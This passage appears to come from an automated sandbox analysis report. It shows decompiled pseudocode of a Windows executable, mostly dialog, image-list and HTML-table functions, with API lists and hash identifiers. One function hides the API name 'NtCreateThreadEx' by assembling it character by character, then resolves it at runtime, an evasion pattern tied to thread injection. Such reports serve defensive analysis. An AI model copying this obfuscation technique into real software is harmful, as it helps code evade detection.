					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                0x0040a1f8
                                                                                                                0x0040a26d
                                                                                                                0x00000000
                                                                                                                0x0040a26f
                                                                                                                0x0040a205
                                                                                                                0x0040a20b
                                                                                                                0x0040a20d
                                                                                                                0x0040a213
                                                                                                                0x0040a214
                                                                                                                0x0040a215
                                                                                                                0x0040a216
                                                                                                                0x0040a217
                                                                                                                0x0040a219
                                                                                                                0x0040a21f
                                                                                                                0x0040a223
                                                                                                                0x0040a227
                                                                                                                0x0040a22b
                                                                                                                0x0040a22f
                                                                                                                0x0040a233
                                                                                                                0x0040a237
                                                                                                                0x0040a23b
                                                                                                                0x0040a23f
                                                                                                                0x0040a243
                                                                                                                0x0040a247
                                                                                                                0x0040a24b
                                                                                                                0x0040a24f
                                                                                                                0x0040a253
                                                                                                                0x0040a257
                                                                                                                0x0040a25b
                                                                                                                0x0040a25f
                                                                                                                0x0040a269
                                                                                                                0x00000000
                                                                                                                0x0040a26c
                                                                                                                0x0040a271

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                0x00407f9b
                                                                                                                0x00407fa3
                                                                                                                0x00407fad
                                                                                                                0x00407fb9
                                                                                                                0x0040802e
                                                                                                                0x00408032
                                                                                                                0x00408038
                                                                                                                0x0040803e
                                                                                                                0x00407fbb
                                                                                                                0x00407fc9
                                                                                                                0x00407fd0
                                                                                                                0x00407fe0
                                                                                                                0x00407fe5
                                                                                                                0x00407ff7
                                                                                                                0x00408015
                                                                                                                0x0040801b
                                                                                                                0x00408021
                                                                                                                0x00408021
                                                                                                                0x00408051
                                                                                                                0x00408051
                                                                                                                0x00408059
                                                                                                                0x00408065
                                                                                                                0x00408069
                                                                                                                0x0040806f
                                                                                                                0x00408087
                                                                                                                0x00408087
                                                                                                                0x0040809c
                                                                                                                0x004080bb
                                                                                                                0x004080d1
                                                                                                                0x004080de
                                                                                                                0x004080e2
                                                                                                                0x004080ea
                                                                                                                0x004080fb
                                                                                                                0x00408105
                                                                                                                0x00408115
                                                                                                                0x00408121
                                                                                                                0x00408127
                                                                                                                0x00408150

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                0x0040ae90
                                                                                                                0x0040aeab
                                                                                                                0x0040aeb2
                                                                                                                0x0040aec0
                                                                                                                0x0040aec7
                                                                                                                0x0040aecc
                                                                                                                0x0040aed3
                                                                                                                0x0040aeda
                                                                                                                0x0040aee1
                                                                                                                0x0040aee1
                                                                                                                0x0040aee7
                                                                                                                0x0040aeea
                                                                                                                0x0040aeed
                                                                                                                0x0040aef9
                                                                                                                0x0040aefe
                                                                                                                0x0040af05
                                                                                                                0x0040af07
                                                                                                                0x0040af08
                                                                                                                0x0040af13
                                                                                                                0x0040af18
                                                                                                                0x0040af19
                                                                                                                0x0040af26
                                                                                                                0x0040af2b
                                                                                                                0x0040af2b
                                                                                                                0x0040af2e
                                                                                                                0x0040af34
                                                                                                                0x0040af43
                                                                                                                0x0040af44
                                                                                                                0x0040af4f
                                                                                                                0x0040af54
                                                                                                                0x0040af55
                                                                                                                0x0040af62
                                                                                                                0x0040af67
                                                                                                                0x0040af70
                                                                                                                0x0040af76
                                                                                                                0x0040af7a
                                                                                                                0x0040af82
                                                                                                                0x0040af88
                                                                                                                0x0040af8d
                                                                                                                0x0040af97
                                                                                                                0x0040af9f
                                                                                                                0x0040afa5
                                                                                                                0x0040afa9
                                                                                                                0x0040afb1
                                                                                                                0x0040afb7
                                                                                                                0x0040afbd

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                0x00403c09
                                                                                                                0x00403c0c
                                                                                                                0x00403c11
                                                                                                                0x00403c1b
                                                                                                                0x00403c3f
                                                                                                                0x00403c4a
                                                                                                                0x00403c6e
                                                                                                                0x00403c96
                                                                                                                0x00403c9a
                                                                                                                0x00403ca6
                                                                                                                0x00403cb3
                                                                                                                0x00403cb8
                                                                                                                0x00403cc5
                                                                                                                0x00403cca
                                                                                                                0x00403cdd
                                                                                                                0x00403ce6
                                                                                                                0x00403cf8
                                                                                                                0x00403d11
                                                                                                                0x00403d26
                                                                                                                0x00403d3f
                                                                                                                0x00403d54
                                                                                                                0x00403d6d
                                                                                                                0x00403d76
                                                                                                                0x00403d88
                                                                                                                0x00403d9e
                                                                                                                0x00403db0
                                                                                                                0x00403db5
                                                                                                                0x00403dc4
                                                                                                                0x00403dc8
                                                                                                                0x00403dc9
                                                                                                                0x00403dca
                                                                                                                0x00403dda
                                                                                                                0x00403ddf
                                                                                                                0x00403de2
                                                                                                                0x00403de3
                                                                                                                0x00403df4
                                                                                                                0x00403df8
                                                                                                                0x00403df9
                                                                                                                0x00403dfa
                                                                                                                0x00403e0a
                                                                                                                0x00403e0f
                                                                                                                0x00403e12
                                                                                                                0x00403e13
                                                                                                                0x00403e22
                                                                                                                0x00403e26
                                                                                                                0x00403e28
                                                                                                                0x00403e29
                                                                                                                0x00403e39
                                                                                                                0x00403e3e
                                                                                                                0x00403e41
                                                                                                                0x00403e42
                                                                                                                0x00403e51
                                                                                                                0x00403e55
                                                                                                                0x00403e57
                                                                                                                0x00403e58
                                                                                                                0x00403e68
                                                                                                                0x00403e6d
                                                                                                                0x00403e70
                                                                                                                0x00403e71
                                                                                                                0x00403e71
                                                                                                                0x00403e87
                                                                                                                0x00403e8d
                                                                                                                0x00403e9e
                                                                                                                0x00403ea6
                                                                                                                0x00403eaf
                                                                                                                0x00403ebc

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                0x00407763
                                                                                                                0x0040776c
                                                                                                                0x00407784
                                                                                                                0x0040778b
                                                                                                                0x00407797
                                                                                                                0x00407799
                                                                                                                0x0040779b
                                                                                                                0x004077a7
                                                                                                                0x004077ae
                                                                                                                0x004077bd
                                                                                                                0x004077c4
                                                                                                                0x004077d3
                                                                                                                0x004077da
                                                                                                                0x004077e1
                                                                                                                0x004077e6
                                                                                                                0x004077f2
                                                                                                                0x004077f5
                                                                                                                0x00407804
                                                                                                                0x00407805
                                                                                                                0x00407810
                                                                                                                0x00407812
                                                                                                                0x00407813
                                                                                                                0x00407818
                                                                                                                0x00407818
                                                                                                                0x00407825
                                                                                                                0x0040782d
                                                                                                                0x00407830
                                                                                                                0x0040783a
                                                                                                                0x00407840
                                                                                                                0x00407846
                                                                                                                0x00407849
                                                                                                                0x00407850
                                                                                                                0x0040785e
                                                                                                                0x00407864
                                                                                                                0x00407867
                                                                                                                0x0040786b
                                                                                                                0x0040786f
                                                                                                                0x00407877
                                                                                                                0x0040787a
                                                                                                                0x00407885
                                                                                                                0x00407892
                                                                                                                0x004078a8
                                                                                                                0x004078b8
                                                                                                                0x004078c5
                                                                                                                0x004078ff
                                                                                                                0x004078c7
                                                                                                                0x004078ca
                                                                                                                0x004078dd
                                                                                                                0x004078de
                                                                                                                0x004078e3
                                                                                                                0x004078e8
                                                                                                                0x004078eb
                                                                                                                0x004078f0
                                                                                                                0x004078f0
